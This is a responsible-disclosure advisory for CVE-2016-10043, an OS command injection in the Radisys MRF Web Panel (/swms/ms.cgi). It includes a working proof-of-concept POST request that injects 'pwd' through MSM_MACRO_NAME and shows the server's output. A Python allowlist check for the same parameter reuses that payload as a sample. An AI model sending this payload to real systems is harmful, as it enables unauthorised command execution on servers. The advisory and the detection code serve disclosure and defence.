Radisys MRF - Command Injection Vulnerability

2017-01-27T00:00:00
ID 1337DAY-ID-26831
Type zdt
Reporter Filippos Mastrogiannis
Modified 2017-01-27T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
Title:      MRF Web Panel OS Command Injection
Vendor:     Radisys
Vendor Homepage: http://www.radisys.com
Product:    MRF Web Panel (SWMS)
Version:    9.0.1
CVE:        CVE-2016-10043
CWE:        CWE-78
Risk Level: High
 
Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security
 
-----------------------------------------------------------------------------------------
 
 
Vulnerability Details:
 
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
 
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
 
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
 
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
 
 
Proof Of Concept:
 
1. Log in to the vulnerable MRF web panel (with a standard user account):
   https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP, etc.)
3. Modify and send the following POST request:
 
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
 
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
 
4. Check the output of the injected command 'pwd' in the response:
 
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
 
/var/opt/swms/www/html
 
 
Vulnerability Impact:
 
The application's own data and functionality, or the web server itself, can be
compromised through this OS command injection vulnerability. It may also be
possible to use the server as a platform for attacks against other systems.
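
A defensive check for the affected parameter, added here as an example (not code from the advisory or from Radisys): it parses a urlencoded POST body sent to /swms/ms.cgi and flags any MSM_MACRO_NAME value outside an allowlist. The function name check_ms_cgi_body, the allowlist pattern and the 64-character limit are assumptions; the sample bodies are constructed from the request shown in the proof of concept.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate macro names consist only of letters, digits and
# underscores, like "Show_Fatal_Error_Configuration" in the advisory.
SAFE_MACRO_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
# Characters a shell treats specially; reported so an analyst sees why it fired.
SHELL_META = set("|;&$`<>(){}\\'\"#\n\r ")


def check_ms_cgi_body(body: str) -> list[str]:
    """Return findings for one urlencoded POST body sent to /swms/ms.cgi."""
    findings = []
    # keep_blank_values so an empty MSM_MACRO_NAME is inspected, not dropped.
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("MSM_MACRO_NAME", [])
    if len(values) > 1:
        # Duplicate parameters can make a filter and the CGI see different values.
        findings.append("MSM_MACRO_NAME supplied %d times" % len(values))
    for value in values:  # parse_qs has already percent-decoded each value
        if not SAFE_MACRO_NAME.fullmatch(value):
            meta = "".join(sorted(SHELL_META & set(value)))
            findings.append(
                "MSM_MACRO_NAME outside allowlist (metacharacters: %r)" % meta)
    return findings


# Constructed sample bodies: the first is the benign form of the request, the
# second is the request body shown in the advisory's proof of concept.
BENIGN = ("MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration"
          "&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute")
ADVISORY_POC = ("MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration"
                "|||a%20%23'%20|pwd||a%20%23|\"%20|||a%20%23"
                "&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO"
                "&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("advisory PoC", ADVISORY_POC)):
        print(name, "->", check_ms_cgi_body(body) or "ok")
```

The same allowlist test can run in a reverse proxy or log pipeline in front of the panel; rejecting anything that fails it is stricter than searching for the pipe character alone.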
 
 
Disclaimer:
 
The responsible disclosure policy has been followed.
